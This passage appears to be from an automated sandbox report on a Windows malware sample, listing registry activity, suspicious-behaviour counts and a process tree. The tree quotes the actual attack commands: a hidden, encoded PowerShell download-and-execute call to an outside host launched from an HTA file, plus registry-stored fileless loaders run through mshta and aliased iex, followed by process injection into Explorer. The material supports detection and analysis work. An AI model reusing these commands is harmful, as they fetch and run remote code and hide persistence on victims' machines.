00030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0d5b3cc4-23fa-4b6f- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ad9b39a51576acd4b9e92ed7ccc7ccd6975f5770bd5cf98f21b4f9319b6afa45"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69fcfb23-cbdb-45fb-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1408058b-1968-4ed0-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\18fed43a-443f-4cc3- = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e0e775b7-7242-42f2- = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1408058b-1968-4ed0- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69fcfb23-cbdb-45fb- = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1f882fe5-5cd8-45f8-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0b01533a-5b29-44a9- = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108bd793-d18c-4adb- = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0b01533a-5b29-44a9-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eb62c32f-c5a8-41dd- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2e968968e42aab09a822456d7bc17217069a4286f4cc6fce3ec41e6a38589a3e"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72502431-5802-4ee3-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\afd013d3-6aca-48a0-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\afd013d3-6aca-48a0- = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69fcfb23-cbdb-45fb- = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72502431-5802-4ee3- = f559d78c57f8d901	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72502431-5802-4ee3- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69fcfb23-cbdb-45fb- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a982828d57f8d9019432938d57f8d9019432938d57f8d901473e07000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000646363373663383161663061643966666332633735383663323161353136613239383536393033323838343132393063393636383466306133643961653136300000b20009000400efbe4657456a4657456a2e0000000000000000000000000000000000000000000000000016586a00640063006300370036006300380031006100660030006100640039006600660063003200630037003500380036006300320031006100350031003600610032003900380035003600390030003300320038003800340031003200390030006300390036003600380034006600300061003300640039006100650031003600300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000298a84171000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64636337366338316166306164396666633263373538366332316135313661323938353639303332383834313239306339363638346630613364396165313630000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e02615d9ac9653ee1193597e90c1422bde04d162da5a6511448a0333de6d2491e02615d9ac9653ee1193597e90c1422bdece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\108bd793-d18c-4adb- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537cc51e-2d8e-44bb-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0b01533a-5b29-44a9- = fda1e58d57f8d901	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1f882fe5-5cd8-45f8- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000009275508d57f8d9015622808d57f8d9015622808d57f8d9018a9808000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004657456a2000303733643234383763376432663238353438616265393233373361643333356164346132396132303938343135383134393965346339646166323438363965630000b20009000400efbe4657456a4657456a2e000000000000000000000000000000000000000000000000005f089a00300037003300640032003400380037006300370064003200660032003800350034003800610062006500390032003300370033006100640033003300350061006400340061003200390061003200300039003800340031003500380031003400390039006500340063003900640061006600320034003800360039006500630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000298a84171000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30373364323438376337643266323835343861626539323337336164333335616434613239613230393834313538313439396534633964616632343836396563000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000007279687373696173000000000000000004d162da5a6511448a0333de6d2491e02815d9ac9653ee1193597e90c1422bde04d162da5a6511448a0333de6d2491e02815d9ac9653ee1193597e90c1422bdece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003500370034003500300038003900340036002d003300340039003900320037003600370030002d0031003100380035003700330036003400380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000001d6f9299000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\afd013d3-6aca-48a0-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0b01533a-5b29-44a9-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72502431-5802-4ee3- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0b01533a-5b29-44a9- = "\\\\?\\Volume{99926F1D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7bc0088eba699b92efa47081b58ef5b52a864bfaa41addce48899aae05b2dfe4"	RuntimeBroker.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2184 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

2184 PING.EXE

pid	process
2184	PING.EXE

pid	process
2184	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeDLWwX.exepowershell.exeExplorer.EXE

pid	process
1724	powershell.exe
1724	powershell.exe
3928	DLWwX.exe
3928	DLWwX.exe
4184	powershell.exe
4184	powershell.exe
4184	powershell.exe
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3172 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

4184 powershell.exe
3172 Explorer.EXE
3172 Explorer.EXE
3172 Explorer.EXE
3172 Explorer.EXE
3172 Explorer.EXE
3764 cmd.exe
3172 Explorer.EXE

pid	process
3172	Explorer.EXE

pid	process
4184	powershell.exe
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3172	Explorer.EXE
3764	cmd.exe
3172	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

powershell.exepowershell.exeExplorer.EXERuntimeBroker.exe

description	pid	process
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeShutdownPrivilege	3172	Explorer.EXE
Token: SeCreatePagefilePrivilege	3172	Explorer.EXE
Token: SeShutdownPrivilege	3172	Explorer.EXE
Token: SeCreatePagefilePrivilege	3172	Explorer.EXE
Token: SeShutdownPrivilege	3172	Explorer.EXE
Token: SeCreatePagefilePrivilege	3172	Explorer.EXE
Token: SeShutdownPrivilege	3172	Explorer.EXE
Token: SeCreatePagefilePrivilege	3172	Explorer.EXE
Token: SeShutdownPrivilege	3700	RuntimeBroker.exe
Token: SeShutdownPrivilege	3700	RuntimeBroker.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3172 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3172 Explorer.EXE

pid	process
3172	Explorer.EXE

pid	process
3172	Explorer.EXE

Suspicious use of WriteProcessMemory 55 IoCs

Processes:

mshta.execmd.exepowershell.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3944 wrote to memory of 3236	3944	mshta.exe	cmd.exe
PID 3944 wrote to memory of 3236	3944	mshta.exe	cmd.exe
PID 3944 wrote to memory of 3236	3944	mshta.exe	cmd.exe
PID 3236 wrote to memory of 1724	3236	cmd.exe	powershell.exe
PID 3236 wrote to memory of 1724	3236	cmd.exe	powershell.exe
PID 3236 wrote to memory of 1724	3236	cmd.exe	powershell.exe
PID 1724 wrote to memory of 3928	1724	powershell.exe	DLWwX.exe
PID 1724 wrote to memory of 3928	1724	powershell.exe	DLWwX.exe
PID 1724 wrote to memory of 3928	1724	powershell.exe	DLWwX.exe
PID 5040 wrote to memory of 4184	5040	mshta.exe	powershell.exe
PID 5040 wrote to memory of 4184	5040	mshta.exe	powershell.exe
PID 4184 wrote to memory of 324	4184	powershell.exe	csc.exe
PID 4184 wrote to memory of 324	4184	powershell.exe	csc.exe
PID 324 wrote to memory of 852	324	csc.exe	cvtres.exe
PID 324 wrote to memory of 852	324	csc.exe	cvtres.exe
PID 4184 wrote to memory of 2552	4184	powershell.exe	csc.exe
PID 4184 wrote to memory of 2552	4184	powershell.exe	csc.exe
PID 2552 wrote to memory of 4472	2552	csc.exe	cvtres.exe
PID 2552 wrote to memory of 4472	2552	csc.exe	cvtres.exe
PID 4184 wrote to memory of 3172	4184	powershell.exe	Explorer.EXE
PID 4184 wrote to memory of 3172	4184	powershell.exe	Explorer.EXE
PID 4184 wrote to memory of 3172	4184	powershell.exe	Explorer.EXE
PID 4184 wrote to memory of 3172	4184	powershell.exe	Explorer.EXE
PID 3172 wrote to memory of 3700	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 3700	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 3764	3172	Explorer.EXE	cmd.exe
PID 3172 wrote to memory of 3764	3172	Explorer.EXE	cmd.exe
PID 3172 wrote to memory of 3764	3172	Explorer.EXE	cmd.exe
PID 3172 wrote to memory of 3700	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 3700	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 4020	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 4020	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 4020	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 4020	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 5064	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 5064	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 3764	3172	Explorer.EXE	cmd.exe
PID 3172 wrote to memory of 5064	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 3764	3172	Explorer.EXE	cmd.exe
PID 3172 wrote to memory of 5064	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 412	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 412	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 412	3172	Explorer.EXE	RuntimeBroker.exe
PID 3172 wrote to memory of 412	3172	Explorer.EXE	RuntimeBroker.exe
PID 3764 wrote to memory of 2184	3764	cmd.exe	PING.EXE
PID 3764 wrote to memory of 2184	3764	cmd.exe	PING.EXE
PID 3764 wrote to memory of 2184	3764	cmd.exe	PING.EXE
PID 3764 wrote to memory of 2184	3764	cmd.exe	PING.EXE
PID 3764 wrote to memory of 2184	3764	cmd.exe	PING.EXE
PID 3172 wrote to memory of 4144	3172	Explorer.EXE	cmd.exe
PID 3172 wrote to memory of 4144	3172	Explorer.EXE	cmd.exe
PID 3172 wrote to memory of 4144	3172	Explorer.EXE	cmd.exe
PID 3172 wrote to memory of 4144	3172	Explorer.EXE	cmd.exe
PID 3172 wrote to memory of 4144	3172	Explorer.EXE	cmd.exe
PID 3172 wrote to memory of 4144	3172	Explorer.EXE	cmd.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3700

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5064

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4020

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3172

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\client_5.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3944

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
3⤵
- Suspicious use of WriteProcessMemory
PID:3236

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1724

C:\Users\Admin\AppData\Local\Temp\DLWwX.exe
"C:\Users\Admin\AppData\Local\Temp\DLWwX.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3928 -s 472
6⤵
- Program crash
PID:4680

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lc87='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lc87).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\DD164BDA-982A-17AD-8A61-4C3B5E25409F\\\FolderOptions'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gqphorlf -value gp; new-alias -name astvxebgbw -value iex; astvxebgbw ([System.Text.Encoding]::ASCII.GetString((gqphorlf "HKCU:Software\AppDataLow\Software\Microsoft\DD164BDA-982A-17AD-8A61-4C3B5E25409F").MelodyTool))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4184

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f2mwd3xk\f2mwd3xk.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:324

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7191.tmp" "c:\Users\Admin\AppData\Local\Temp\f2mwd3xk\CSC88A40D9E46C24281AA4C2E160ACF426.TMP"
5⤵
PID:852

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mcbmmmg5\mcbmmmg5.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2552

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7376.tmp" "c:\Users\Admin\AppData\Local\Temp\mcbmmmg5\CSC109200EA473048668B3B728964BFCD92.TMP"
5⤵
PID:4472

C:\Windows\System32\cmd.exe
